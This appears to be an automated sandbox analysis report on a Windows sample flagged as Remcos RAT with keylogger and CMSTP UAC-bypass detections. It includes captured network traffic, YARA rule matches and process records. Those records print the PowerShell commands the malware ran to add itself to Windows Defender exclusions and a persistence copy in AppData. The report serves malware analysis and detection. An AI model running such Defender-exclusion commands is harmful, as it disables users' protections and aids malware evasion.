                                                                                                                                                                                                                                          Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          0192.168.2.44975113.107.246.674437744C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                                          Host: js.monitor.azure.com
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                          Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Fri, 03 Jan 2025 23:02:10 GMT
                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                          Content-Length: 207935
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                                          Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                                          ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                                          x-ms-request-id: 275be117-b01e-0006-4a05-581325000000
                                                                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                                                                          x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                                          x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                          x-azure-ref: 20250103T230210Z-156796c549btxqbfhC1EWR2hbg0000000ssg0000000070ep
                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                          X-Cache-Info: L1_T2
                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                                          Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                                                          Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                          Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                                                          Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                                                          Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                          Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                                                          Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                                                          Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                                                          Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                                                          Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:18:01:54
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\iGhDjzEiDU.exe"
                                                                                                                                                                                                                                          Imagebase:0xb70000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:18:01:57
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                                                                                                                                                                                                                                          Imagebase:0xd10000
                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:18:01:57
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:18:01:57
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\iGhDjzEiDU.exe"
                                                                                                                                                                                                                                          Imagebase:0x370000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:18:01:57
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\iGhDjzEiDU.exe"
                                                                                                                                                                                                                                          Imagebase:0x510000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:18:01:58
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                                                                          Imagebase:0x510000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                                                                          Imagebase:0xd10000
